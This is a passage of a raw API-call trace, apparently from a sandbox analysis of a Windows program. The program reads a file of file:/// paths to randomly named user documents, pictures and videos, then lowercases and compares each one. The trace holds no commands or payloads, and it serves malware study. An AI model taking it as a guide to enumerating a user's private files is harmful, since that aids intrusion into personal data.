[0085.794] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/9u1awhjmofi.gif") returned -1 [0085.794] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/7qgdkajlv%20ov0mtf.pptx") returned -1 [0085.794] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/y7ykwwplwltoj6hk%20z.pptx") returned -1 [0085.794] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/oz2_mrsbrizc.xlsx") returned -1 [0085.794] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/cs9dbb0db.pps") returned -1 [0085.794] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/7ogjb-qe0l0.rtf") returned -1 [0085.794] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/thsn5kdbg.jpg") returned -1 [0085.794] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/yfxu1rpal7.bmp") returned -1 [0085.794] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/_5xg3ier-feuapuc9w9.odp") returned -1 [0085.794] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/lpldj8us8y.ods") returned -1 [0085.794] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.794] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.794] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.794] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/Y9ZT5OXV0OoeQ.png" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png" [0085.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned 69 [0085.795] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.795] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.795] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.795] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/YDkx2UOsAgxc.mkv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv" [0085.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned 59 [0085.795] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.795] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.795] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.795] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/d3L_N2j.doc" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc" [0085.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc") returned 95 [0085.795] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.795] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.795] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x180, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x180, lpOverlapped=0x0) returned 1 [0085.795] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/TpxyvhqitSjWoNKMm/yWZ6bCkDGKeaDV/F485kpxIwZE6mw85XH.gif" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif" [0085.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif") returned 126 [0085.795] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.795] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.795] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.795] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/LwSAqUbPFkFK.mkv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv" [0085.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv") returned 59 [0085.795] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.796] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.796] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.796] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/XZebUk9_OI5.xls" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls" [0085.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls") returned 99 [0085.796] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.796] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.796] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.796] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/VWKCvzfj9FEO9nNP/0MGUK_Iy.odt" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt" [0085.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt") returned 73 [0085.796] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.796] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.796] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.796] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/TpxyvhqitSjWoNKMm/rI2TsF%20ElIz.png" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png" [0085.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png") returned 106 [0085.796] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.796] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.796] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.796] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/dEUUJNf811ulfl.pptx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx" [0085.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx") returned 65 [0085.796] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.796] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.796] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.796] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/Uj4X.ots" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots" [0085.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots") returned 92 [0085.796] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.796] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.797] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.797] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/INEFsuw.ots" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots" [0085.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots") returned 63 [0085.797] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.797] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.797] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.797] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/aUSvDDs.flv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv" [0085.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv") returned 54 [0085.797] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.797] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.797] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.797] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/QaG1IpiLh.png" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png" [0085.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png") returned 58 [0085.797] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.797] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.797] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.797] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/3xOPVc16f2J.odp" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp" [0085.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp") returned 99 [0085.797] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.797] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.797] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.797] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/qbgWPIV.swf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf" [0085.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf") returned 55 [0085.797] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.798] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.798] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.798] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/Aq04%20pKplamwzt5%20J.rtf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf" [0085.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf") returned 71 [0085.798] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.798] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.798] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.798] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/YAw0Ef1-rV%20J.png" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png" [0085.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png") returned 89 [0085.798] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.798] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.798] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.798] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/l5KV.swf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf" [0085.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf") returned 52 [0085.798] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.798] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.798] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.798] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/S2p0EKc.xlsx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx" [0085.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx") returned 58 [0085.798] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.798] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.798] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.798] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/_J5.png" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png" [0085.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png") returned 51 [0085.798] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.798] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.799] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 